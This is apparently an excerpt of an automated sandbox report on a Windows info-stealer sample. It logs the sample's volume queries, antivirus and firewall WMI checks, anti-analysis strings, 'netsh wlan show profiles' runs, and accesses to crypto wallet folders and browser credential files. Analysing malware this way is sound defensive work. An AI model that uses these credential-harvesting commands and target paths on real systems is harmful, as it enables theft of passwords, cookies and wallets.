                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                              Source: C:\Windows\explorer.exeCode function: 4_2_0984671C GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter,4_2_0984671C
                              Source: C:\Windows\explorer.exeCode function: 4_2_09835570 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free,4_2_09835570
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69003518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,11_2_00007FF69003518C
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E3833EC GetVersionExW,0_2_00007FF79E3833EC
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exeBinary or memory string: procmon.exe
                              Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exeBinary or memory string: procexp.exe
                              Source: yINR7uQlPr.exe, svchost.exe, 1DC30FADAFF92643095942.exe, audiodg.exe, msiexec.exeBinary or memory string: autoruns.exe
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: 19.2.Gxtuum.exe.7a0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 20.2.Gxtuum.exe.7a0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 19.0.Gxtuum.exe.7a0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 18.2.EC2F.tmp.gfx.exe.690000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 30.2.rundll32.exe.69710000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 29.2.rundll32.exe.69710000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 20.0.Gxtuum.exe.7a0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 18.0.EC2F.tmp.gfx.exe.690000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000004.00000003.3106042420.000000000AAAB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll, type: DROPPED
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 17.0.D7AB.tmp.ssg.exe.5c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000004.00000003.2262245343.000000000AA52000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.2265531996.00000000005C2000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: D7AB.tmp.ssg.exe PID: 4444, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe, type: DROPPED
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\walletsLRjq
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $jq2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxxLiberty`,jq
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.walletLRjq
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLRjqL
                              Source: explorer.exe, 00000004.00000002.3545928795.000000000AA28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: metroexodus.exe
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $jq%appdata%`,jqdC:\Users\user\AppData\Roaming`,jqdC:\Users\user\AppData\Roaming\Binance
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\walletsLRjqL
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $jq&%localappdata%\Coinomi\Coinomi\walletsLRjq
                              Source: D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002ADF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $jq6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                              Source: powershell.exe, 0000001F.00000002.2637613775.00007FF848780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
